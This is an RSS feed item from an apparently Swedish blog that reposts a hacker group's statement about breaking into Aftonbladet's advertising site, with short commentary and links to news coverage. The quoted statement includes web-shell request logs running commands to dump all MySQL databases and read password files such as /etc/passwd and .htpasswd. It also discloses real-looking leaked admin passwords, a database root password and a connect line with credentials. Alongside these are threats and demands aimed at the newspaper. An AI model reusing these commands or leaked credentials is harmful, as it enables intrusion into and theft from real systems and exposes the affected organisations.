195.169.149.213 &#8211; - [18/Jun/2006:21:28:39 +0200] &#034;GET /h4x.php?cmd=rm%20-f%20/tmp/.e HTTP/1.1&#034; 200 62<br />
195.169.149.213 &#8211; - [18/Jun/2006:21:28:49 +0200] &#034;GET /h4x.php?cmd=mysqldump%20&#8211;help HTTP/1.1&#034; 200 62</em></p>
<p><em>lyckades med mysqldump:<br />
195.169.149.213 &#8211; - [18/Jun/2006:21:33:42 +0200] &#034;GET /h4x.php?cmd=/usr/local/mysql/bin/mysqldump%20&#8211;all-databases%20&#8211;user=root%20&#8211;password=8ull3r6yn%20%3E/tmp/.e HTTP/1.1&#034; 200 62<br />
195.169.149.213 &#8211; - [18/Jun/2006:21:36:35 +0200] &#034;GET /h4x.php?cmd=cat%20/tmp/.e HTTP/1.1&#034; 200 3902808</em></p>
<p><em>Hämtar hem lösenordsfil för apache htaccess<br />
199.77.130.14 &#8211; - [18/Jun/2006:03:46:09 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/Library/WebServer/Documents/inpoc/.htpasswd HTTP/1.1&#034; 200 44<br />
plockar hem lösenordsfil för purftpd:<br />
88.191.12.200 &#8211; - [18/Jun/2006:03:47:51 +0200] &#034;GET /annons/h4x.php?cmd=strings%20/private/etc/pure-ftpd/pureftpd.passwd</em></p>
<p><em>rotar i appleshare:<br />
88.191.12.200 &#8211; - [18/Jun/2006:03:53:20 +0200] &#034;GET /annons/h4x.php?cmd=ls%20-la%20/Library/Filesystems/AppleShare/Authentication HTTP/1.1&#034; 200 127</em></p>
<p><em>mystiskt anrop: 213.92.92.22 &#8211; - [18/Jun/2006:03:53:24 +0200] &#034;GET /w00tw00t.at.ISC.SANS.DFind<img src="http://www.flashback.info/images/smilies2/smile1.gif" title="Smile" class="inlineimg" border="0" /> HTTP/1.1&#034; 400 416</em></p>
<p><em>systemets lösenordsfil hämtas hem (förhoppningsvis är den shadowad):<br />
84.55.93.136 &#8211; - [18/Jun/2006:10:07:27 +0200] &#034;GET /annons/h4x.php?cmd=cat%20/etc/passwd HTTP/1.1&#034; 200 1885</em></p>
<p><em>Alltså:<br />
- &#8211; rootlösen för mysql är på vift tillsammans med all data som fanns lagrad i mysql. Byt lösenord.<br />
- &#8211; lösenordet för afp kan vara hackat<br />
- &#8211; man har med stor sannolikhet bruteforcecrackat lösenorden till htaccess, pureftpd och även systemlösenord (om nu inte den filen var shadowad).</em></p>
<p><em>Alltså byt alla lösenord nu. När ni har gjort det se till att byta till det nya mysqllösenordet i filen includes/dbConnect.php</em></p>
<p><em>/Xxx</em></p>
<p><em>&#8212;-</em></p>
<p><em>Och självfallet bjussar vi på lite mera skoj:<br />
<a href="http://www.flashback.info/leave.php?http://pastebin.com/m554733a3"  target="_blank">http://pastebin.com/m554733a3</a></em></p>
<p><em>Notera att lösenorden för annonserna fortfarande fungerar och att annonsföretagen<br />
inte fick sina lösenord utbytta eller ens en notering om att vi fått tag på dem.</em></p>
<p><em>Här är en liten lista på vilka admin-lösenord som använts och används:</em></p>
<p><em>jawohl<br />
hepburn<br />
catherine<br />
sinatra<br />
donjuan<br />
5pad3r<br />
8ull3r6yn<br />
k4ll34nk455</em></p>
<p><em>Samt lite länkar värda att besöka:</em></p>
<p><em>transfer3.aftonbladet.se/inpoc/<br />
<a href="http://www.flashback.info/leave.php?http://annons.aftonbladet.se/admin/"  target="_blank">http://annons.aftonbladet.se/admin/</a><br />
<a href="http://www.flashback.info/leave.php?http://annons.aftonbladet.se/"  target="_blank">http://annons.aftonbladet.se/</a></em></p>
<p><em>Lite kort om Infomaker/xlibris:<br />
&#034;XLibris Publisher är ett webbpubliceringssystem som troligen är det mest använda på tidningar i Sverige. Systemet är uppbyggt kring en kraftfull mediadatabas för texter, bilder, filer, länkar m m. Tillsammans med databasen byggs ett mallsystem för din webb upp. Mallarna kan liknas vid sidmallar för vanlig tidningsproduktion kompletterade med intelligens.&#034;</em></p>
<p><em>Här har ni Infomakers lösenord (som kanske fungerar på annat håll, vem vet <img src="http://www.flashback.info/images/smilies2/wink.gif" title="Whink" class="inlineimg" border="0" />:</em></p>
<p><em>$db = mysql_pconnect(&#034;localhost&#034;,&#034;xlibris&#034;,&#034;xRpm2000&#034;);</em></p>
<p><em>Ni har några års loggar att gå igenom, hoppas ni får det skoj!</em></p>
<p><em>&#034;Nu har jag läst loggarna och det är ingen rolig läsning.&#034;<br />
MOAUHGAUHHHAHAHA</em></p>
<p><em>Allt prat om att vi tog oss in via er internsida är bara skit. Det var där vi dumpade de<br />
hashade lösenorden därför att den efterblivna algoritm som används där har sårbarheter.<br />
Idioter.</em></p>
<p><em>Tills vidare. Aftonbladet: Ert mörkläggande av det här är fan pinsamt. Vi begär<br />
att ni inom kort går ut med en vräkartikel på er hemsida och i er superfina<br />
tidning där ni själva erkänner att det är NI som varit ignoranta och helt jävla<br />
CHOCKDUMMA. Kan ni skriva om Kikki &amp; Co och hur fel de beter sig, helt utan<br />
empati, så nog fan är det dags att ni själva inser vad ni lyckats med. Ansvaret<br />
ligger hos er. Hur fan kan ni vara så taffliga när det kommer till att hantera<br />
denna typ av information?</em></p>
<p><em>Gå ut med sanningen nu eller så börjar vi publicera andra saker &#8211; som ni redan vet<br />
så har vi tappat alla våra spärrar för moral för länge sedan, jävlas inte..</em></p>
<p><em>En kort notis:<br />
Vi har ingen som helst koppling till AUH. Likheten av namnval valde vi utav<br />
respekt för vad de står för och lyckats med. Vi hoppas att aktioner likt denna<br />
gör att fler folk blir inspirerade till att hacka, så som vi blivit av AUH.</em></p>
<p><em>Och det kan även nämnas att:<br />
En samling förbannade hackare som lyckats filura ut hur man kontaktar oss har<br />
anslutit sig till VFH och kommer att hjälpa till med framtida uppdrag. Om du/ni<br />
känner er manade samt besitter höga kunskaper inom datorer och jävulskap hoppas<br />
vi mer än gärna att ni ansluter er till oss.</em></p>
<p><em>Mvh. Vuxna Förbannade Hackare</em></p>
<p><em>&#034;Intelligence without ambition is a bird without wings.&#034;</em>                                            &#034;</p>
<p>Det är ganska intressant läsning det här.<br />
Ni kan fortsätta med diskussionen <a href="http://www.flashback.info/showthread.php?t=598838" target="_blank">här<br />
</a>Kan även läsa på IDG &#034;<a href="http://www.idg.se/2.1085/1.139020"  target="_blank">Ytterligare Aftonbladet-lösenord publicerade på nätet&#034;</a> lika så &#034;<a href="http://www.idg.se/2.1085/1.139021"  target="_blank">Hackare hotar Aftonbladet</a>&#034;</p>
<p>Det har även läckt ut en bild ifrån den hackade sidan som ska ligga som bevis för att attacken har genomförts då inge bilder har visas tidigare.<br />
<a href="http://www.lediga.st/wp-content/uploads/2008/01/annonsaftonbladet2.JPG"  title="Aftonbladet Annos Hackad"><img src="http://www.lediga.st/wp-content/uploads/2008/01/annonsaftonbladet2.thumbnail.JPG" alt="Aftonbladet Annos Hackad" /></a></p>
<hr/>Copyright &copy; 2010 <strong><a href="http://www.lediga.st" >En blå resa</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact legal@lediga.st so we can take legal action immediately.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/" >Plugin</a> by <a href="http://www.taragana.com/" >Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://www.lediga.st/2008/01/vuxna-forbannade-hackare-i-farten-igen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
